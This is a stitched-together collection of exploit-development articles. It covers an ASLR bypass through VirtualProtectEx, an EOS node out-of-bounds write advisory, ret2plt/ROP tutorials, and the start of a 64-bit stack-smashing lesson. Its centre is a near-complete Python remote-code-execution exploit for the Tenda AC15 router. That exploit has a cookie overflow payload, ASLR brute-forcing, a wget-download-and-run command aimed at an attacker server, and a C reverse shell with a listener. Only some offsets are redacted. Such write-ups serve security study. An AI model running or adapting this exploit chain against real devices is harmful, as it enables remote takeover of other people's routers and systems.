VirtualProtectEx to bypass ASLR : A specific case study

Original text by Souhail Hammou 

VirtualProtectEx to bypass ASLR : A specific case study

More than a year ago, I developed a local privilege escalation exploit for a product (that I cannot disclose unfortunately) in which I had to bypass ASLR.

For the record, these are the protections enabled in the targeted service’s binary, it is a 32-bit executable running under Wow64 on 64-bit systems.

Basically, I was able to communicate through IPC with the system service and tell it to execute a function in its address space by pointer (it’s a bit more tricky than this but you get the point). Actually, this would have been impossible if CFG was enabled.

Within the main module, I have located a function that invokes «system()» with an argument that I control. At this point, it was just a matter of bypassing ASLR in order to get that function’s address and elevate privileges on the machine. However, I couldn’t trigger any leaks through the IPC channel to get or deduce the main module’s base.

But as luck would have it, the service exposed some other functionality through IPC and one of them was the ability to call VirtualProtectEx and letting us supply a PID, the address, the size, and the new protection. The service was also kind enough to return the old protection of the region to our process via IPC.

Bypassing ASLR should be obvious by now knowing these two crucial points :

  • The function that we want to invoke resides in the main module.
  • On Windows the main executable’s module of a process is the first module, with the lowest address in the user address space.

It is now only a matter of writing code to communicate with the service and to brute-force the location of the main module; we do that by looking for the first executable page in the address space and then calculating the main module’s base : generally by subtracting 0x1000 from that page since the .text section is the first section.

The pseudo-code below shows an example of how this was done :

pid = /*Locate the service’s pid with the help of NtQuerySystemInformation*/;
for( Page = 0x1000; Page < 0x7fffffff; Page += 0x1000 )
{
Page_cp = Page;
OldProtection = CommunicateServiceVirtualProtect(
pid, //We give the service its own pid
Page, //Address of the page in the service’s process
PAGE_EXECUTE_READWRITE, //Change to the most permissible protection to avoid crashes
0x1000
);
if ( OldProtection == -1 ) //Invalid page
continue;
if ( OldProtection == PAGE_EXECUTE_READ )
{
//this is the main module’s .text section
Base = Page — 0x1000;
Page = 0x7fffefff; //to break after restoring the old protection
}
//restore the old protection
CommunicateServiceVirtualProtect(
pid,
Page_cp,
OldProtection,
0x1000
);
}
//Use the base to calculate the function address
pFunc = Base + FuncOffset;
//….

view rawVp_ASLR_bf.c hosted with ❤ by GitHub

Launching a new process with SYSTEM privileges was easy at this point.

Thank you for reading and until another time 🙂

You can follow me on Twitter : here

Реклама

EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds

Vulnerability Description

EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds

We found and successfully exploit a buffer out-of-bounds write vulnerability in EOS when parsing a WASM file.

To use this vulnerability, attacker could upload a malicious smart contract to the nodes server, after the contract get parsed by nodes server, the malicious payload could execute on the server and taken control of it.

After taken control of the nodes server, attacker could then pack the malicious contract into new block and further control all nodes of the EOS network.

Vulnerability Reporting Timeline

2018-5-11                  EOS Out-of-bound Write Vulnerability Found

2018-5-28                Full Exploit Demo of Compromise EOS Super Node Completed

2018-5-28                Vulnerability Details Reported to Vendor

2018-5-29                 Vendor Fixed the Vulnerability on Github and Closed the Issue

2018-5-29                   Notices the Vendor the Fixing is not complete

Some Telegram chats with Daniel Larimer:

We trying to report the bug to him.

He said they will not ship the EOS without fixing, and ask us send the report privately since some people are running public test nets

 +1,699,900 470,700 2,098,300 Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

He provided his mailbox and we send the report to him

 +1,699,900 470,700 2,098,300 Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

He provided his mailbox and we send the report to him

EOS fixed the vulnerability and Daniel would give the acknowledgement.

RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System

Technical Detail of the Vulnerability  

This is a buffer out-of-bounds write vulnerability

At libraries/chain/webassembly/binaryen.cpp (Line 78),Function binaryen_runtime::instantiate_module:

for (auto& segment : module->table.segments) {
Address offset = ConstantExpressionRunner<TrivialGlobalManager>(globals).visit(segment.offset).value.geti32();
assert(offset + segment.data.size() <= module->table.initial);
for (size_t i = 0; i != segment.data.size(); ++i) {
table[offset + i] = segment.data[i]; <= OOB write here !
}
}

Here table is a std::vector contains the Names in the function table. When storing elements into the table, the |offset| filed is not correctly checked. Note there is a assert before setting the value, which checks the offset, however unfortunately, |assert| only works in Debug build and does not work in a Release build.

The table is initialized earlier in the statement:

table.resize(module->table.initial);

Here |module->table.initial| is read from the function table declaration section in the WASM file and the valid value for this field is 0 ~ 1024.

The |offset| filed is also read from the WASM file, in the data section, it is a signed 32-bits value.

So basically with this vulnerability we can write to a fairly wide range after the table vector’s memory.

How to reproduce the vulnerability

  1. Build the release version of latest EOS code

./eosio-build.sh

  1. Start EOS node, finish all the necessary settings described at:

https://github.com/EOSIO/eos/wiki/Tutorial-Getting-Started-With-Contracts

  1. Set a vulnerable contract:

We have provided a proof of concept WASM to demonstrate a crash.

In our PoC, we simply set the |offset| field to 0xffffffff so it can crash immediately when the out of bound write occurs.

To test the PoC:
cd poc
cleos set contract eosio ../poc -p eosio

If everything is OK, you will see nodeos process gets segment fault.

The crash info:

(gdb) c

Continuing.

Program received signal SIGSEGV, Segmentation fault.

0x0000000000a32f7c in eosio::chain::webassembly::binaryen::binaryen_runtime::instantiate_module(char const*, unsigned long, std::vector<unsigned char, std::allocator<unsigned char> >) ()

(gdb) x/i $pc

=> 0xa32f7c <_ZN5eosio5chain11webassembly8binaryen16binaryen_runtime18instantiate_moduleEPKcmSt6vectorIhSaIhEE+2972>:   mov    %rcx,(%rdx,%rax,1)

(gdb) p $rdx

$1 = 59699184

(gdb) p $rax

$2 = 34359738360

Here |rdx| points to the start of the |table| vector,

And |rax| is 0x7FFFFFFF8, which holds the value of |offset| * 8.

Exploit the vulnerability to achieve Remote Code Execution

This vulnerability could be leveraged to achieve remote code execution in the nodeos process, by uploading malicious contracts to the victim node and letting the node parse the malicious contract. In a real attack, the attacker may publishes a malicious contract to the EOS main network.

The malicious contract is first parsed by the EOS super node, then the vulnerability was triggered and the attacker controls the EOS super node which parsed the contract.

The attacker can steal the private key of super nodes or control content of new blocks. What’s more, attackers can pack the malicious contract into a new block and publish it. As a result, all the full nodes in the entire network will be controlled by the attacker.

We have finished a proof-of-concept exploit, and tested on the nodeos build on 64-bits Ubuntu system. The exploit works like this:

  1. The attacker uploads malicious contracts to the nodeos server.
  2. The server nodeos process parses the malicious contracts, which triggers the vulnerability.
  3. With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance. And with the help of our malicious WASM code, we finally achieves arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS.
  4. Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker.

You can refer to the video we provided to get some idea about what the exploit looks like, We may provide the full exploit chain later.

The Fixing of Vulnerability

Bytemaster on EOS’s github opened issue 3498 for the vulnerability that we reported:

And fixed the related code

But as the comment made by Yuki on the commit, the fixing is still have problem on 32-bits process and not so prefect.

Bypass ASLR+NX Part 1

Hi guys today i will explain how to bypass ASLR and NX mitigation technique if you dont have any knowledge about ASLR and NX you can read it in Above link i will explain it but not in depth

ASLR:Address Space Layout randomization : it’s mitigation to technique to prevent exploitation of memory by make Address randomize not fixed as we saw in basic buffer overflow exploit it need to but start of buffer in EIP and Redirect execution to execute your shellcode but when it’s random it will make it hard to guess that start of buffer random it’s only in shared library address we found ASLR in stack address ,Heap Address.

NX: Non-Executable it;s another mitigation use to prevent memory from execute any machine code(shellcode) as we saw in basic buffer overflow  you  put shellcode in stack and redirect EIP to begin of buffer to execute it but this will not work here this mitigation could be bypass by Ret2libc exploit technique use function inside binary pass it to stack and aslo they are another way   depend on gadgets inside binary or shared library this technique is ROP Return Oriented Programming i will  make separate article .

After we get little info about ASLR and NX now it’s time to see how we can bypass it, to bypass ASLR there are many ways like Ret2PLT use Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(func@PLT) why we use Return in PLT because it’not randomized  it’s address know before execution itself  another technique is overwrite GOT and  brute-forcing this technique use when the address partial randomized like 2 or 3 bytes just randomized .

in this article i will explain technique combine Ret2plt and some ROP gadgets and Ret2libc see let divided it
first find Ret2PLT

vulnerable code

we compile it with following Flags

now let check ASLR it’s enable it

 

as you see in above image libc it’s randomized but it could be brute-force it

now let open file in gdb

now it’s clear NX was enable it now let fuzzing binary .

we create pattern and we going to pass to  binary  to detect where overflow occur

 

 

now we can see they are pattern in EIP we use another tool to find where overflow occurred.

1028 to overwrite EBP if we add 4bytes we going control EIP and we can redirect our execution.

 

now we have control EIP .

ok after we do basic overflow steps now we need way let us to bypass ASLR+NX .

first find functions PLT in binary file.

we find strcpy and system PLT now how we going to build our exploit depend on two methods just.
second we must find writable section in binary file to fill it and use system like to we did in traditional Ret2libc.

first think in .bss section is use by compilers and linkers for the  part  of the data segment containing static allocated variables that are not initialized .

after that we will use strcpy to write string in .bss address but what address ?
ok let back to function we find it in PLT strcpy as we know we will be use to write string and system to execute command but will can;t find /bin/sh in binary file we have another way is to look at binary.

now we have string address  it’s time to combine all pieces we found it.

1-use strcpy to copy from SRC to DEST SRC in this case it’s our string «sh» and DEST   it’s our writable area «.bss» but we need to chain two method strcpy and system we look for gadgets depend on our parameters in this case just we need pop pop ret.

we chose 0x080484ba does’t matter  register name  we need just two pop .
2-after we write string  we use system like we use it in Ret2libc but in this case «/bin/sh» will be .bss address.

final payload

strcpy+ppr+.bss+s
strcpy+ppr+.bss+1+h
system+dump+.bss

Final Exploit

 

we got Shell somtime you need to chain many technique to get final exploit to bypass more than one mitigation.

REMOTE CODE EXECUTION ROP,NX,ASLR (CVE-2018-5767) Tenda’s AC15 router

INTRODUCTION (CVE-2018-5767)

In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to develop a working exploit.

N.B – Numerous attempts were made to contact the vendor with no success. Due to the nature of the vulnerability, offset’s have been redacted from the post to prevent point and click exploitation.

LAYING THE GROUNDWORK

The vulnerability in question is caused by a buffer overflow due to unsanitised user input being passed directly to a call to sscanf. The figure below shows the vulnerable code in the R7WebsSecurityHandler function of the HTTPD binary for the device.

Note that the “password=” parameter is part of the Cookie header. We see that the code uses strstr to find this field, and then copies everything after the equals size (excluding a ‘;’ character – important for later) into a fixed size stack buffer.

If we send a large enough password value we can crash the server, in the following picture we have attached to the process using a cross compiled Gdbserver binary, we can access the device using telnet (a story for another post).

This crash isn’t exactly ideal. We can see that it’s due to an invalid read attempting to load a byte from R3 which points to 0x41414141. From our analysis this was identified as occurring in a shared library and instead of looking for ways to exploit it, we turned our focus back on the vulnerable function to try and determine what was happening after the overflow.

In the next figure we see the issue; if the string copied into the buffer contains “.gif”, then the function returns immediately without further processing. The code isn’t looking for “.gif” in the password, but in the user controlled buffer for the whole request. Avoiding further processing of a overflown buffer and returning immediately is exactly what we want (loc_2f7ac simply jumps to the function epilogue).

Appending “.gif” to the end of a long password string of “A”‘s gives us a segfault with PC=0x41414141. With the ability to reliably control the flow of execution we can now outline the problems we must address, and therefore begin to solve them – and so at the same time, develop a working exploit.

To begin with, the following information is available about the binary:

file httpd
format elf
type EXEC (Executable file)
arch arm
bintype elf
bits 32
canary false
endian little
intrp /lib/ld-uClibc.so.0
machine ARM
nx true
pic false
relocs false
relro no
static false

I’ve only included the most important details – mainly, the binary is a 32bit ARMEL executable, dynamically linked with NX being the only exploit mitigation enabled (note that the system has randomize_va_space = 1, which we’ll have to deal with). Therefore, we have the following problems to address:

  1. Gain reliable control of PC through offset of controllable buffer.
  2. Bypass No Execute (NX, the stack is not executable).
  3. Bypass Address space layout randomisation (randomize_va_space = 1).
  4. Chain it all together into a full exploit.

PROBLEM SOLVING 101

The first problem to solve is a general one when it comes to exploiting memory corruption vulnerabilities such as this –  identifying the offset within the buffer at which we can control certain registers. We solve this problem using Metasploit’s pattern create and pattern offset scripts. We identify the correct offset and show reliable control of the PC register:

With problem 1 solved, our next task involves bypassing No Execute. No Execute (NX or DEP) simply prevents us from executing shellcode on the stack. It ensures that there are no writeable and executable pages of memory. NX has been around for a while so we won’t go into great detail about how it works or its bypasses, all we need is some ROP magic.

We make use of the “Return to Zero Protection” (ret2zp) method [1]. The problem with building a ROP chain for the ARM architecture is down to the fact that function arguments are passed through the R0-R3 registers, as opposed to the stack for Intel x86. To bypass NX on an x86 processor we would simply carry out a ret2libc attack, whereby we store the address of libc’s system function at the correct offset, and then a null terminated string at offset+4 for the command we wish to run:

To perform a similar attack on our current target, we need to pass the address of our command through R0, and then need some way of jumping to the system function. The sort of gadget we need for this is a mov instruction whereby the stack pointer is moved into R0. This gives us the following layout:

We identify such a gadget in the libc shared library, however, the gadget performs the following instructions.

mov sp, r0
blx r3

This means that before jumping to this gadget, we must have the address of system in R3. To solve this problem, we simply locate a gadget that allows us to mov or pop values from the stack into R3, and we identify such a gadget again in the libc library:

pop {r3,r4,r7,pc}

This gadget has the added benefit of jumping to SP+12, our buffer should therefore look as such:

Note the ‘;.gif’ string at the end of the buffer, recall that the call to sscanf stops at a ‘;’ character, whilst the ‘.gif’ string will allow us to cleanly exit the function. With the following Python code, we have essentially bypassed NX with two gadgets:

libc_base = ****
curr_libc = libc_base + (0x7c &lt;&lt; 12)
system = struct.pack(«&lt;I», curr_libc + ****)
#: pop {r3, r4, r7, pc}
pop = struct.pack(«&lt;I», curr_libc + ****)
#: mov r0, sp ; blx r3
mv_r0_sp = struct.pack(«&lt;I», curr_libc + ****)
password = «A»*offset
password += pop + system + «B»*8 + mv_r0_sp + command + «.gif»

With problem 2 solved, we now move onto our third problem; bypassing ASLR. Address space layout randomisation can be very difficult to bypass when we are attacking network based applications, this is generally due to the fact that we need some form of information leak. Although it is not enabled on the binary itself, the shared library addresses all load at different addresses on each execution. One method to generate an information leak would be to use “native” gadgets present in the HTTPD binary (which does not have ASLR) and ROP into the leak. The problem here however is that each gadget contains a null byte, and so we can only use 1. If we look at how random the randomisation really is, we see that actually the library addresses (specifically libc which contains our gadgets) only differ by one byte on each execution. For example, on one run libc’s base may be located at 0xXXXXXXXX, and on the next run it is at 0xXXXXXXXX

. We could theoretically guess this value, and we would have a small chance of guessing correct.

This is where our faithful watchdog process comes in. One process running on this device is responsible for restarting services that have crashed, so every time the HTTPD process segfaults, it is immediately restarted, pretty handy for us. This is enough for us to do some naïve brute forcing, using the following process:

With NX and ASLR successfully bypassed, we now need to put this all together (problem 3). This however, provides us with another set of problems to solve:

  1. How do we detect the exploit has been successful?
  2. How do we use this exploit to run arbitrary code on the device?

We start by solving problem 2, which in turn will help us solve problem 1. There are a few steps involved with running arbitrary code on the device. Firstly, we can make use of tools on the device to download arbitrary scripts or binaries, for example, the following command string will download a file from a remote server over HTTP, change its permissions to executable and then run it:

command = «wget http://192.168.0.104/malware -O /tmp/malware &amp;&amp; chmod 777 /tmp/malware &amp;&amp; /tmp/malware &amp;;»

The “malware” binary should give some indication that the device has been exploited remotely, to achieve this, we write a simple TCP connect back program. This program will create a connection back to our attacking system, and duplicate the stdin and stdout file descriptors – it’s just a simple reverse shell.

#include <sys/socket.h>

#include <sys/types.h>

#include <string.h>

#include <stdio.h>

#include <netinet/in.h>

int main(int argc, char **argv)

{

struct sockaddr_in addr;

socklen_t addrlen;

int sock = socket(AF_INET, SOCK_STREAM, 0);

memset(&addr, 0x00, sizeof(addr));

addr.sin_family = AF_INET;

addr.sin_port = htons(31337);

addr.sin_addr.s_addr = inet_addr(“192.168.0.104”);

int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

system(“/bin/sh”);

}

We need to cross compile this code into an ARM binary, to do this, we use a prebuilt toolchain downloaded from Uclibc. We also want to automate the entire process of this exploit, as such, we use the following code to handle compiling the malicious code (with a dynamically configurable IP address). We then use a subprocess to compile the code (with the user defined port and IP), and serve it over HTTP using Python’s SimpleHTTPServer module.

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

#write the code with ip and port to a.c

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

#wait for the process to terminate so we can get its return code

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

This code will allow us to utilise the wget tool present on the device to fetch our binary and run it, this in turn will allow us to solve problem 1. We can identify if the exploit has been successful by waiting for connections back. The abstract diagram in the next figure shows how we can make use of a few threads with a global flag to solve problem 1 given the solution to problem 2.

The functions shown in the following code take care of these processes:

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777

/tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base address each time

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d”%i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the process.

time.sleep(1)

 

print “[+] Exploit done”

Finally, we put all of this together by spawning the individual threads, as well as getting command line options as usual:

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”,

help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”,

help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”,

help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your  ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified,

you need a uclibc arm cross compiler,

such as https://www.uclibc.org/downloads/

binaries/0.9.30/cross-compiler-arm4l.tar.bz2″)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

With all of this together, we run the code and after a few minutes get our reverse shell as root:

The full code is here:

#!/usr/bin/env python

import urllib2

import struct

import time

import socket

from optparse import *

import SimpleHTTPServer

import SocketServer

import threading

import sys

import os

import subprocess

 

ARM_REV_SHELL = (

“#include <sys/socket.h>\n”

“#include <sys/types.h>\n”

“#include <string.h>\n”

“#include <stdio.h>\n”

“#include <netinet/in.h>\n”

“int main(int argc, char **argv)\n”

“{\n”

”           struct sockaddr_in addr;\n”

”           socklen_t addrlen;\n”

”           int sock = socket(AF_INET, SOCK_STREAM, 0);\n”

 

”           memset(&addr, 0x00, sizeof(addr));\n”

 

”           addr.sin_family = AF_INET;\n”

”           addr.sin_port = htons(%d);\n”

”           addr.sin_addr.s_addr = inet_addr(\”%s\”);\n”

 

”           int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n”

 

”           dup2(sock, 0);\n”

”           dup2(sock, 1);\n”

”           dup2(sock, 2);\n”

 

”           system(\”/bin/sh\”);\n”

“}\n”

)

 

REV_PORT = 31337

HTTPD_PORT = 8888

DONE = False

 

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

 

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base continuosly

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d” %i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the

time.sleep(1)

 

print “[+] Exploit done”

 

 

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”, help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”, help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”, help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2”)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

64-bit Linux stack smashing tutorial: Part 3

t’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda$ c
Continuing.

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
